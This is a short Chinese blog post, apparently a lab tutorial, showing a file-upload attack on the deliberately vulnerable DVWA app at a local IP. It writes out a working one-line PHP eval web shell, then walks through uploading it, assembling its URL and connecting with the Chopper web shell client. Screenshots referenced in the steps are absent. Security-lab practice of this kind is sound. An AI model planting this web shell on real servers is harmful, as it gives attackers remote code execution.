安全测试 实例 1 低级别文件上传漏洞 只针对不限制上传文件格式时使用;如果对格式进行了限制需要高级别,下一篇详细讲

第一步:

编写恶意程序

test.php

//一句话木马,在后台开启等待请求  pass字符串  开启webshell

// 内容:

<?php @ eval ($_POST['pass']);?>

 

 文件放在桌面上,待会将它上传

第二步,2.1在靶机上上传文件,获得红色的一个url地址

              2.2像图片中操作步骤一样,进行拼接

 

 

 

2.3拼接后得到一个地址

http://192.168.18.133/dvwa/hackable/uploads/text.php

 

 

 第三步,在菜刀工具上操作,抓取整个页面的数据

 

 

 

 

 

 

 

 

 

posted @ 2021-07-16 18:21  胖豆芽  阅读(76)  评论(0编辑  收藏  举报